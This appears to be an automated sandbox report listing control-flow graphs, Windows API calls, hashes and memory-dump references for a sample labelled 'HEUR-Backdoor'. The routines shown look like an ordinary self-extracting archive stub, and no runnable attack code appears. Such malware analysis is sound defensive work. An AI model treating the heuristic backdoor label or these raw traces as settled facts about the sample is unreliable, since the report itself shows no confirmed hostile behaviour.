                                                • CloseHandle.KERNEL32(?), ref: 007ECFF5
                                                • ShowWindow.USER32(?,00000001), ref: 007ED084
                                                  • Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                • String ID: $.exe$.inf
                                                • API String ID: 3686203788-2452507128
                                                • Opcode ID: 6720969aa5c63271a31f17626ad64a83842f5b0cf029c05ff9a59dabd1eaef99
                                                • Instruction ID: 6849759ff1899d5a2e0c6c78b16893516f5e1225bcf5f137ad566bdc54809264
                                                • Opcode Fuzzy Hash: 6720969aa5c63271a31f17626ad64a83842f5b0cf029c05ff9a59dabd1eaef99
                                                • Instruction Fuzzy Hash: 0161F3754063C0DAD7329F66D8146ABBBE9FF89300F088819F5C097250D7B98D8ACB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 871 7fa058-7fa071 872 7fa087-7fa08c 871->872 873 7fa073-7fa083 call 7fe6ed 871->873 874 7fa08e-7fa096 872->874 875 7fa099-7fa0bd MultiByteToWideChar 872->875 873->872 883 7fa085 873->883 874->875 877 7fa0c3-7fa0cf 875->877 878 7fa250-7fa263 call 7eec4a 875->878 880 7fa123 877->880 881 7fa0d1-7fa0e2 877->881 887 7fa125-7fa127 880->887 884 7fa0e4-7fa0f3 call 801a30 881->884 885 7fa101-7fa112 call 7f8518 881->885 883->872 891 7fa245 884->891 898 7fa0f9-7fa0ff 884->898 885->891 899 7fa118 885->899 890 7fa12d-7fa140 MultiByteToWideChar 887->890 887->891 890->891 892 7fa146-7fa158 call 7fa72c 890->892 893 7fa247-7fa24e call 7fa2c0 891->893 900 7fa15d-7fa161 892->900 893->878 902 7fa11e-7fa121 898->902 899->902 900->891 903 7fa167-7fa16e 900->903 902->887 904 7fa1a8-7fa1b4 903->904 905 7fa170-7fa175 903->905 907 7fa1b6-7fa1c7 904->907 908 7fa200 904->908 905->893 906 7fa17b-7fa17d 905->906 906->891 909 7fa183-7fa19d call 7fa72c 906->909 911 7fa1c9-7fa1d8 call 801a30 907->911 912 7fa1e2-7fa1f3 call 7f8518 907->912 910 7fa202-7fa204 908->910 909->893 924 7fa1a3 909->924 915 7fa23e-7fa244 call 7fa2c0 910->915 916 7fa206-7fa21f call 7fa72c 910->916 911->915 927 7fa1da-7fa1e0 911->927 912->915 923 7fa1f5 912->923 915->891 916->915 929 7fa221-7fa228 916->929 928 7fa1fb-7fa1fe 923->928 924->891 927->928 928->910 930 7fa22a-7fa22b 929->930 931 7fa264-7fa26a 929->931 932 7fa22c-7fa23c WideCharToMultiByte 930->932 931->932 932->915 933 7fa26c-7fa273 call 7fa2c0 932->933 933->893
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007F4E35,007F4E35,?,?,?,007FA2A9,00000001,00000001,3FE85006), ref: 007FA0B2
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007FA2A9,00000001,00000001,3FE85006,?,?,?), ref: 007FA138
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007FA232
                                                • __freea.LIBCMT ref: 007FA23F
                                                  • Part of subcall function 007F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A
                                                • __freea.LIBCMT ref: 007FA248
                                                • __freea.LIBCMT ref: 007FA26D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: e9062ccab8d391b5810199b49617542d7f51d51f2b7d34cb19a13124aa6947f7
                                                • Instruction ID: 185b491158e7cde798edfb3cfe4487b2a589ed118eaa2d6fee0683578bb153f6
                                                • Opcode Fuzzy Hash: e9062ccab8d391b5810199b49617542d7f51d51f2b7d34cb19a13124aa6947f7
                                                • Instruction Fuzzy Hash: D251B3B271021EBFDB259F64CC45EBB77A9FB84760F154628FE08D6241DB39DC408662
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 936 7f76bd-7f76ca 937 7f76cc-7f76d0 936->937 938 7f76e8-7f7711 call 7fb290 GetModuleFileNameA 936->938 937->938 940 7f76d2-7f76e3 call 7f895a call 7f8839 937->940 943 7f7718 938->943 944 7f7713-7f7716 938->944 950 7f77dc-7f77e0 940->950 946 7f771a-7f7744 call 7f77e1 call 7f7956 943->946 944->943 944->946 954 7f7746-7f7750 call 7f895a 946->954 955 7f7752-7f776f call 7f77e1 946->955 962 7f7783-7f7785 954->962 960 7f7787-7f779a call 7fada3 955->960 961 7f7771-7f777e 955->961 967 7f779c-7f779f 960->967 968 7f77a1-7f77aa 960->968 961->962 963 7f77d1-7f77db call 7f84de 962->963 963->950 970 7f77c7-7f77ce call 7f84de 967->970 971 7f77ac-7f77b2 968->971 972 7f77b4-7f77c1 968->972 970->963 971->971 971->972 972->970
                                                APIs
                                                • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe,00000104), ref: 007F76FD
                                                • _free.LIBCMT ref: 007F77C8
                                                • _free.LIBCMT ref: 007F77D2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: 0&`$C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                                • API String ID: 2506810119-3753216696
                                                • Opcode ID: 956537905a7560f7b06df491ff674c273a35f891d905785af3d318bfd6b37047
                                                • Instruction ID: 575bae82f0fdd5ce8240301b7cb180ac6b6a5b456a2a68b3b95a2f7199189721
                                                • Opcode Fuzzy Hash: 956537905a7560f7b06df491ff674c273a35f891d905785af3d318bfd6b37047
                                                • Instruction Fuzzy Hash: 78319171A1820CEFDB25EF99DC899BEBBECEB94710B144066E60497311D6B44E40CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 007E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007E00A0
                                                  • Part of subcall function 007E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007DEB86,Crypt32.dll,00000000,007DEC0A,?,?,007DEBEC,?,?,?), ref: 007E00C2
                                                • OleInitialize.OLE32(00000000), ref: 007EA34E
                                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007EA385
                                                • SHGetMalloc.SHELL32(00818430), ref: 007EA38F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                • String ID: riched20.dll$3To
                                                • API String ID: 3498096277-2168385784
                                                • Opcode ID: 50514a541aa4087b7c6a6c6d9cced41be74f07c959f7124ec129399d8b5c67af
                                                • Instruction ID: 7acad33624b285af761e64f4aecf488f9c0709401e5ddc76b635572a5918c19d
                                                • Opcode Fuzzy Hash: 50514a541aa4087b7c6a6c6d9cced41be74f07c959f7124ec129399d8b5c67af
                                                • Instruction Fuzzy Hash: 36F04FB1C00209ABCB10AF9AD8499EFFBFCFF94301F00455AE914E2200DBB856458BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 979 7d99b0-7d99d1 call 7ee360 982 7d99dc 979->982 983 7d99d3-7d99d6 979->983 985 7d99de-7d99fb 982->985 983->982 984 7d99d8-7d99da 983->984 984->985 986 7d99fd 985->986 987 7d9a03-7d9a0d 985->987 986->987 988 7d9a0f 987->988 989 7d9a12-7d9a31 call 7d70bf 987->989 988->989 992 7d9a39-7d9a57 CreateFileW 989->992 993 7d9a33 989->993 994 7d9a59-7d9a7b GetLastError call 7db66c 992->994 995 7d9abb-7d9ac0 992->995 993->992 1003 7d9a7d-7d9a9f CreateFileW GetLastError 994->1003 1004 7d9aaa-7d9aaf 994->1004 997 7d9ae1-7d9af5 995->997 998 7d9ac2-7d9ac5 995->998 1001 7d9af7-7d9b0f call 7dfe56 997->1001 1002 7d9b13-7d9b1e 997->1002 998->997 1000 7d9ac7-7d9adb SetFileTime 998->1000 1000->997 1001->1002 1006 7d9aa5-7d9aa8 1003->1006 1007 7d9aa1 1003->1007 1004->995 1008 7d9ab1 1004->1008 1006->995 1006->1004 1007->1006 1008->995
                                                APIs
                                                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,007D78AD,?,00000005,?,00000011), ref: 007D9A4C
                                                • GetLastError.KERNEL32(?,?,007D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007D9A59
                                                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,007D78AD,?,00000005,?), ref: 007D9A8E
                                                • GetLastError.KERNEL32(?,?,007D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007D9A96
                                                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,007D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007D9ADB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: File$CreateErrorLast$Time
                                                • String ID:
                                                • API String ID: 1999340476-0
                                                • Opcode ID: 4cc4bf3a66ccb74e753de068f27360ce65fa2fdcd779dc7d3688da06a97198cc
                                                • Instruction ID: ea42e4165e179bdc80881cd11b771350e3a308911589b6b7e289376fa6228bfc
                                                • Opcode Fuzzy Hash: 4cc4bf3a66ccb74e753de068f27360ce65fa2fdcd779dc7d3688da06a97198cc
                                                • Instruction Fuzzy Hash: CE414631544B46AFE3209B20CC09BDABBE4BB45324F10471BF6E4962D1E779A988CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1038 7fb610-7fb625 GetEnvironmentStringsW 1039 7fb67d 1038->1039 1040 7fb627-7fb647 call 7fb5d9 WideCharToMultiByte 1038->1040 1041 7fb67f-7fb681 1039->1041 1040->1039 1046 7fb649-7fb64a call 7f8518 1040->1046 1043 7fb68a-7fb692 1041->1043 1044 7fb683-7fb684 FreeEnvironmentStringsW 1041->1044 1044->1043 1048 7fb64f-7fb654 1046->1048 1049 7fb656-7fb66a WideCharToMultiByte 1048->1049 1050 7fb672 1048->1050 1049->1050 1051 7fb66c-7fb670 1049->1051 1052 7fb674-7fb67b call 7f84de 1050->1052 1051->1052 1052->1041
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 007FB619
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007FB63C
                                                  • Part of subcall function 007F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007FB662
                                                • _free.LIBCMT ref: 007FB675
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007FB684
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: 03ab359a858400c7933f50d21b689032be576be92ac4a5a1fa6d216244c88bec
                                                • Instruction ID: 73f38be647fb539191b585f9fbda30b7ffe27485fbe8038583327cf556212a54
                                                • Opcode Fuzzy Hash: 03ab359a858400c7933f50d21b689032be576be92ac4a5a1fa6d216244c88bec
                                                • Instruction Fuzzy Hash: 4101A772611619BF63611A76AC8CC7F7A6DEEC7BA13250229FE04D7310DF68CD0191B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1055 7eac74-7eac8d PeekMessageW 1056 7eac8f-7eaca3 GetMessageW 1055->1056 1057 7eacc8-7eaccc 1055->1057 1058 7eacb4-7eacc2 TranslateMessage DispatchMessageW 1056->1058 1059 7eaca5-7eacb2 IsDialogMessageW 1056->1059 1058->1057 1059->1057 1059->1058
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007EAC85
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007EAC96
                                                • IsDialogMessageW.USER32(0001041A,?), ref: 007EACAA
                                                • TranslateMessage.USER32(?), ref: 007EACB8
                                                • DispatchMessageW.USER32(?), ref: 007EACC2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Message$DialogDispatchPeekTranslate
                                                • String ID:
                                                • API String ID: 1266772231-0
                                                • Opcode ID: e42dab8ae4ea41955e3c67c8e7750f2541239adcefba0df816f2fbb0f034ef8f
                                                • Instruction ID: 5244cfffa112e58e66393479fa7a8fb58d63dbaa7845d6c3ca0b634fa2aa54f9
                                                • Opcode Fuzzy Hash: e42dab8ae4ea41955e3c67c8e7750f2541239adcefba0df816f2fbb0f034ef8f
                                                • Instruction Fuzzy Hash: C4F01D71902229AB8B249BE2AC4CDEB7F6CFE452517404915F405D2110EA28E409CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1060 7ea2c7-7ea2e6 GetClassNameW 1061 7ea30e-7ea310 1060->1061 1062 7ea2e8-7ea2fd call 7e17ac 1060->1062 1064 7ea31b-7ea31f 1061->1064 1065 7ea312-7ea315 SHAutoComplete 1061->1065 1067 7ea2ff-7ea30b FindWindowExW 1062->1067 1068 7ea30d 1062->1068 1065->1064 1067->1068 1068->1061
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000050), ref: 007EA2DE
                                                • SHAutoComplete.SHLWAPI(?,00000010), ref: 007EA315
                                                  • Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2
                                                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 007EA305
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                • String ID: EDIT
                                                • API String ID: 4243998846-3080729518
                                                • Opcode ID: 32c43e1d18cb0209b303c84f2ebe609ad5e1641c9ffd90f8c244a690043d7094
                                                • Instruction ID: 97872541de9ad8db66a0caf6d2bd67ebb0e2778282fe2dab56aad7f11f50fedd
                                                • Opcode Fuzzy Hash: 32c43e1d18cb0209b303c84f2ebe609ad5e1641c9ffd90f8c244a690043d7094
                                                • Instruction Fuzzy Hash: 32F02732B0262877E7305665AC09FDB736CAF8AB00F440062BE04E3180D764AD45C6F6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007ED29D
                                                • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007ED2D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: EnvironmentVariable
                                                • String ID: sfxcmd$sfxpar
                                                • API String ID: 1431749950-3493335439
                                                • Opcode ID: 5eaa54d3afa66ae0d2aac7d2bd61815a0cece5a51753bf7ecd254ce006cd32ce
                                                • Instruction ID: 39a729d5a8852a8de155c25a376a780a5a479bcbe192e552686b249802a0bc54
                                                • Opcode Fuzzy Hash: 5eaa54d3afa66ae0d2aac7d2bd61815a0cece5a51753bf7ecd254ce006cd32ce
                                                • Instruction Fuzzy Hash: 5EF0A072802628E7DB306F919C1AABE7B6CFF0DB41B044412FD89A6241D668CD40DAF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 007D985E
                                                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 007D9876
                                                • GetLastError.KERNEL32 ref: 007D98A8
                                                • GetLastError.KERNEL32 ref: 007D98C7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorLast$FileHandleRead
                                                • String ID:
                                                • API String ID: 2244327787-0
                                                • Opcode ID: e8790be8cf1908fe03959298c44faff17b9597a17f1afe0b24dfbeccceae6459
                                                • Instruction ID: 746c4741fa008068473f36ddc1fd8c75d81c6045db72c7e7d464b9f1575d7333
                                                • Opcode Fuzzy Hash: e8790be8cf1908fe03959298c44faff17b9597a17f1afe0b24dfbeccceae6459
                                                • Instruction Fuzzy Hash: 2E118E31900604EFDB205B51C804A797BBDFB46B31F14C52BFA6A86790D77D9E40AF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,007F3713,00000000,00000000,?,007FA49B,007F3713,00000000,00000000,00000000,?,007FA698,00000006,FlsSetValue), ref: 007FA526
                                                • GetLastError.KERNEL32(?,007FA49B,007F3713,00000000,00000000,00000000,?,007FA698,00000006,FlsSetValue,00807348,00807350,00000000,00000364,?,007F9077), ref: 007FA532
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007FA49B,007F3713,00000000,00000000,00000000,?,007FA698,00000006,FlsSetValue,00807348,00807350,00000000), ref: 007FA540
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
